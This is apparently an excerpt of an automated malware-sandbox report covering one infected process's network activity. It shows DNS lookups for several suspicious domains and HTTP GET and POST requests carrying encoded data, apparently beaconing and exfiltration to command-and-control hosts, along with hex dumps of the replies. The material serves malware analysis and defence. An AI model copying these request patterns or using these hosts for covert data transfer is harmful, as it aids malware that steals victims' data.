                                                        Jan 11, 2025 02:54:32.005362988 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:32.005450964 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:32.005497932 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:32.010356903 CET4998380192.168.2.1066.29.146.78
                                                        Jan 11, 2025 02:54:32.017064095 CET804998366.29.146.78192.168.2.10
                                                        Jan 11, 2025 02:54:37.074425936 CET4998480192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:37.079328060 CET804998484.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:37.079483032 CET4998480192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:37.099807978 CET4998480192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:37.104697943 CET804998484.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:37.564090014 CET804998484.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:37.564325094 CET4998480192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:38.607918978 CET4998480192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:38.616767883 CET804998484.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:39.626687050 CET4998580192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:39.631628990 CET804998584.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:39.631913900 CET4998580192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:39.646497965 CET4998580192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:39.651392937 CET804998584.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:40.107928991 CET804998584.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:40.111424923 CET4998580192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:41.155338049 CET4998580192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:41.160243034 CET804998584.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:42.177692890 CET4998680192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:42.184257984 CET804998684.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:42.184397936 CET4998680192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:42.199033022 CET4998680192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:42.203984976 CET804998684.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:42.204197884 CET804998684.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:42.660573006 CET804998684.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:42.660638094 CET4998680192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:43.701992989 CET4998680192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:43.707108974 CET804998684.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:44.721060991 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:44.725976944 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:44.726047039 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:44.736860991 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:44.742810965 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193135023 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193166018 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193177938 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193190098 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193298101 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:45.193459988 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193471909 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193483114 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193511009 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:45.193533897 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193547010 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193573952 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:45.193574905 CET804998784.32.84.32192.168.2.10
                                                        Jan 11, 2025 02:54:45.193617105 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:45.199207067 CET4998780192.168.2.1084.32.84.32
                                                        Jan 11, 2025 02:54:45.205461979 CET804998784.32.84.32192.168.2.10
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 11, 2025 02:53:41.165992022 CET4948853192.168.2.101.1.1.1
                                                        Jan 11, 2025 02:53:41.178637981 CET53494881.1.1.1192.168.2.10
                                                        Jan 11, 2025 02:53:56.845695019 CET6243653192.168.2.101.1.1.1
                                                        Jan 11, 2025 02:53:56.948457956 CET53624361.1.1.1192.168.2.10
                                                        Jan 11, 2025 02:54:10.315254927 CET5776753192.168.2.101.1.1.1
                                                        Jan 11, 2025 02:54:10.326186895 CET53577671.1.1.1192.168.2.10
                                                        Jan 11, 2025 02:54:23.721194029 CET5793853192.168.2.101.1.1.1
                                                        Jan 11, 2025 02:54:23.744086027 CET53579381.1.1.1192.168.2.10
                                                        Jan 11, 2025 02:54:37.018598080 CET6400953192.168.2.101.1.1.1
                                                        Jan 11, 2025 02:54:37.071832895 CET53640091.1.1.1192.168.2.10
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 11, 2025 02:53:41.165992022 CET192.168.2.101.1.1.10x7352Standard query (0)www.hirmic4820voe.shopA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:53:56.845695019 CET192.168.2.101.1.1.10x55faStandard query (0)www.elinor.clubA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:10.315254927 CET192.168.2.101.1.1.10x938dStandard query (0)www.happytrail.lifeA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:23.721194029 CET192.168.2.101.1.1.10x3eStandard query (0)www.spinpinang01.clickA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:37.018598080 CET192.168.2.101.1.1.10xcf93Standard query (0)www.athanasopoulos.xyzA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 11, 2025 02:52:35.800616980 CET1.1.1.1192.168.2.100x2939No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 11, 2025 02:52:35.800616980 CET1.1.1.1192.168.2.100x2939No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:53:41.178637981 CET1.1.1.1192.168.2.100x7352No error (0)www.hirmic4820voe.shophirmic4820voe.shopCNAME (Canonical name)IN (0x0001)false
                                                        Jan 11, 2025 02:53:41.178637981 CET1.1.1.1192.168.2.100x7352No error (0)hirmic4820voe.shop162.0.215.91A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:53:56.948457956 CET1.1.1.1192.168.2.100x55faNo error (0)www.elinor.club194.58.112.174A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:10.326186895 CET1.1.1.1192.168.2.100x938dNo error (0)www.happytrail.life199.192.23.123A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:23.744086027 CET1.1.1.1192.168.2.100x3eNo error (0)www.spinpinang01.clickspinpinang01.clickCNAME (Canonical name)IN (0x0001)false
                                                        Jan 11, 2025 02:54:23.744086027 CET1.1.1.1192.168.2.100x3eNo error (0)spinpinang01.click66.29.146.78A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 02:54:37.071832895 CET1.1.1.1192.168.2.100xcf93No error (0)www.athanasopoulos.xyzathanasopoulos.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Jan 11, 2025 02:54:37.071832895 CET1.1.1.1192.168.2.100xcf93No error (0)athanasopoulos.xyz84.32.84.32A (IP address)IN (0x0001)false
                                                        • www.hirmic4820voe.shop
                                                        • www.elinor.club
                                                        • www.happytrail.life
                                                        • www.spinpinang01.click
                                                        • www.athanasopoulos.xyz
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049971162.0.215.91806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:53:41.200656891 CET401OUTGET /3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q== HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.hirmic4820voe.shop
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Jan 11, 2025 02:53:41.779856920 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        date: Sat, 11 Jan 2025 01:53:41 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                        Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                        Jan 11, 2025 02:53:41.779872894 CET224INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                        Jan 11, 2025 02:53:41.779884100 CET1236INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                        Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                        Jan 11, 2025 02:53:41.779895067 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                        Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                        Jan 11, 2025 02:53:41.779905081 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                        Jan 11, 2025 02:53:41.779916048 CET672INData Raw: 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48
                                                        Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
                                                        Jan 11, 2025 02:53:41.779927015 CET1236INData Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48
                                                        Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
                                                        Jan 11, 2025 02:53:41.779939890 CET1116INData Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d
                                                        Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab
                                                        Jan 11, 2025 02:53:41.780478954 CET1236INData Raw: 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67
                                                        Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
                                                        Jan 11, 2025 02:53:41.780498028 CET918INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65
                                                        Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.hirmic4820voe.shop/cp_errordocument.shtml (port 80)


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1049972194.58.112.174806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:53:56.971138954 CET656OUTPOST /izuw/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.elinor.club
                                                        Origin: http://www.elinor.club
                                                        Referer: http://www.elinor.club/izuw/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 194
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 53 34 48 50 49 39 4c 72 43 4f 57 45 6f 4c 4c 56 61 4e 38 50 38 4d 4e 62 44 6e 62 56 53 43 45 51 78 70 71 6c 67 4c 63 62 44 64 36 4e 70 73 52 41 38 34 46 6b 45 37 2f 4e 55 2b 65 65 47 4d 34 59 4b 72 54 50 6a 70 77 72 61 2f 31 6c 54 6c 66 36 54 39 56 6a 4a 72 6c 72 79 6b 4c 69 37 76 4b 36 68 36 2b 32 71 47 65 68 69 69 55 39 65 53 76 39 6e 50 4b 78 72 77 47 42 4f 6b 32 6e 35 47 63 45 69 45 33 48 4e 46 71 79 39 57 6b 55 61 70 4b 47 76 66 61 61 7a 66 63 43 5a 7a 31 59 78 34 6d 67 71 51 4d 4a 56 6f 6d 4c 37 6e 47 5a 64 55 75 65
                                                        Data Ascii: 0lTTc=msZ4rMLyjYtOS4HPI9LrCOWEoLLVaN8P8MNbDnbVSCEQxpqlgLcbDd6NpsRA84FkE7/NU+eeGM4YKrTPjpwra/1lTlf6T9VjJrlrykLi7vK6h6+2qGehiiU9eSv9nPKxrwGBOk2n5GcEiE3HNFqy9WkUapKGvfaazfcCZz1Yx4mgqQMJVomL7nGZdUue
                                                        Jan 11, 2025 02:53:57.649286985 CET341INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Sat, 11 Jan 2025 01:53:57 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Location: http://elinor.club/izuw/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.1049973194.58.112.174806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:53:59.520834923 CET680OUTPOST /izuw/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.elinor.club
                                                        Origin: http://www.elinor.club
                                                        Referer: http://www.elinor.club/izuw/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 218
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 54 5a 33 50 4f 63 4c 72 48 75 57 48 30 62 4c 56 55 74 38 55 38 4d 42 62 44 6d 76 38 53 78 73 51 77 49 61 6c 78 36 63 62 41 64 36 4e 6d 4d 52 42 69 49 45 71 45 37 79 77 55 36 43 65 47 4d 63 59 4b 71 44 50 6a 2b 45 71 56 50 31 37 59 46 66 34 4f 4e 56 6a 4a 72 6c 72 79 6b 75 31 37 76 69 36 68 4c 4f 32 34 79 71 6d 6b 53 55 36 4a 69 76 39 6a 50 4b 31 72 77 47 76 4f 6c 72 38 35 45 6b 45 69 47 76 48 4e 78 2b 39 30 57 6b 57 56 4a 4b 59 69 74 66 53 72 63 70 35 62 53 74 5a 68 34 33 49 74 78 78 4f 45 35 48 63 6f 51 61 58 54 53 62 30 51 38 71 38 74 35 54 65 38 53 4f 76 73 50 50 36 6c 32 33 74 72 77 3d 3d
                                                        Data Ascii: 0lTTc=msZ4rMLyjYtOTZ3POcLrHuWH0bLVUt8U8MBbDmv8SxsQwIalx6cbAd6NmMRBiIEqE7ywU6CeGMcYKqDPj+EqVP17YFf4ONVjJrlryku17vi6hLO24yqmkSU6Jiv9jPK1rwGvOlr85EkEiGvHNx+90WkWVJKYitfSrcp5bStZh43ItxxOE5HcoQaXTSb0Q8q8t5Te8SOvsPP6l23trw==
                                                        Jan 11, 2025 02:54:00.195969105 CET341INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Sat, 11 Jan 2025 01:54:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Location: http://elinor.club/izuw/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.1049974194.58.112.174806248C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 02:54:02.068490982 CET1693OUTPOST /izuw/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.elinor.club
                                                        Origin: http://www.elinor.club
                                                        Referer: http://www.elinor.club/izuw/
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S6310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36
                                                        Data Raw: 30 6c 54 54 63 3d 6d 73 5a 34 72 4d 4c 79 6a 59 74 4f 54 5a 33 50 4f 63 4c 72 48 75 57 48 30 62 4c 56 55 74 38 55 38 4d 42 62 44 6d 76 38 53 78 30 51 77 36 69 6c 6a 70 45 62 42 64 36 4e 76 73 52 45 69 49 46 32 45 37 36 30 55 39 4b 4f 47 4f 55 59 4c 49 62 50 30 36 59 71 4f 2f 31 37 58 6c 66 39 54 39 56 4d 4a 72 31 33 79 6b 65 31 37 76 69 36 68 49 57 32 36 6d 65 6d 6d 53 55 39 65 53 76 50 6e 50 4c 6f 72 78 76 53 4f 6c 75 4a 36 31 45 45 69 6d 2f 48 57 6e 43 39 70 6d 6b 75 5a 70 4c 4c 69 73 6a 64 72 63 30 43 62 53 4a 7a 68 36 6e 49 6f 48 6f 78 61 6f 6d 46 7a 51 4f 52 4e 44 50 56 65 61 6d 70 31 5a 65 65 33 42 43 52 2b 2b 53 33 6e 46 33 6a 32 64 6a 69 52 44 32 55 34 4d 6a 43 75 75 72 42 6d 4f 78 4b 78 4f 34 33 5a 70 43 39 53 2b 63 77 36 34 56 49 44 42 75 7a 58 5a 34 49 30 4b 7a 4a 41 73 77 31 69 48 53 39 68 47 66 53 37 37 70 68 6a 6d 75 2f 33 41 44 4a 57 32 6f 42 2b 43 68 46 31 41 7a 6c 51 32 71 53 6e 4e 33 64 49 39 37 53 61 59 43 42 52 42 59 39 64 48 6c 75 6d 65 35 42 54 46 35 75 58 2f 76 59 37 70 30 44 [TRUNCATED]
